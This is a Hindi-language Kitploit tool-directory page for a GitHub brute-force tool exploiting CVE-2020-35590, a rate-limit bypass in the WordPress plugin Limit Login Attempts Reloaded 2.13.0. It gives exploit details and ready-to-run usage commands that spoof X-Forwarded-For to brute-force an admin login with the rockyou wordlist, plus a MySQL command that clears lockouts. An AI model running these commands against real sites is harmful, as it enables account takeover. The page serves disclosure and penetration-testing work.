Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-35590 — वर्डप्रेस प्लगइन लिमिट लॉगिन अटेम्प्ट्स रीलोडेड >=2.13.0 के लिए ब्रूट-फोर्स टूल - लॉगिन लिमिट बायपास (CVE-2020-35590) | Kitploit
उपकरण/GitHubGitHub/n4nj0/cve-2020-35590
पासवर्ड हमलेभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubn4nj0/cve-2020-35590

CVE-2020-35590

वर्डप्रेस प्लगइन लिमिट लॉगिन अटेम्प्ट्स रीलोडेड >=2.13.0 के लिए ब्रूट-फोर्स टूल - लॉगिन लिमिट बायपास (CVE-2020-35590)

रिपॉजिटरी देखें
84210 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

शोषण जानकारी

शोषण शीर्षक: WordPress प्लगइन Limit Login Attempts Reloaded 2.13.0 - लॉगिन सीमा बाईपास
CVE: CVE-2020-35590
दिनांक: 2020-06-09
शोषण लेखक: N4nj0
सॉफ्टवेयर लिंक: https://wordpress.org/plugins/limit-login-attempts-reloaded/
संस्करण: 2.13.0
परीक्षित: WordPress 5.4.1, 5.4.2
भेद्यता सलाह: https://n4nj0.github.io/advisories/wordpress-plugin-limit-login-attempts-reloaded/

प्रभावित WordPress प्लगइन एक ब्रूटफोर्स हमला सुरक्षा तंत्र होने का उद्देश्य रखता है, और वर्तमान में 1 मिलियन से अधिक सक्रिय स्थापनाओं में स्थापित है।
मैंने एक गैर-डिफ़ॉल्ट कॉन्फ़िगरेशन के तहत एक दर सीमित बाईपास पाया है, जो प्रभावी रूप से प्लगइन के उद्देश्य को विफल कर देता है।

उपयोग

जाँच

./wp-brute.py -c -u http://wordpress -H X-Forwarded-For -l admin -P /usr/share/wordlists/rockyou.txt
./wp-brute.py --check --url http://wordpress --header X-Forwarded-For --login admin --passwordlist /usr/share/wordlists/rockyou.txt --quiet

शोषण

./wp-brute.py -e -u http://wordpress -H X-Forwarded-For -l admin -P /usr/share/wordlists/rockyou.txt -q
./wp-brute.py --exploit --url http://wordpress --header X-Forwarded-For --login admin --passwordlist /usr/share/wordlists/rockyou.txt --quiet

मैन्युअल रूप से उपयोगकर्ता अनलॉक करें

mysql -uroot -ppassword wordpress -e "UPDATE wp_options SET option_value = '' WHERE option_name = 'limit_login_lockouts' LIMIT 1;"

टूल डाउनलोड करें